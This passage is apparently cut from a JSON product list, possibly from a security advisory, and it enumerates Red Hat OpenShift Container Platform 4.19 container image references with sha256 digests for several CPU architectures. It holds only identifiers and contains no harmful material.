"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
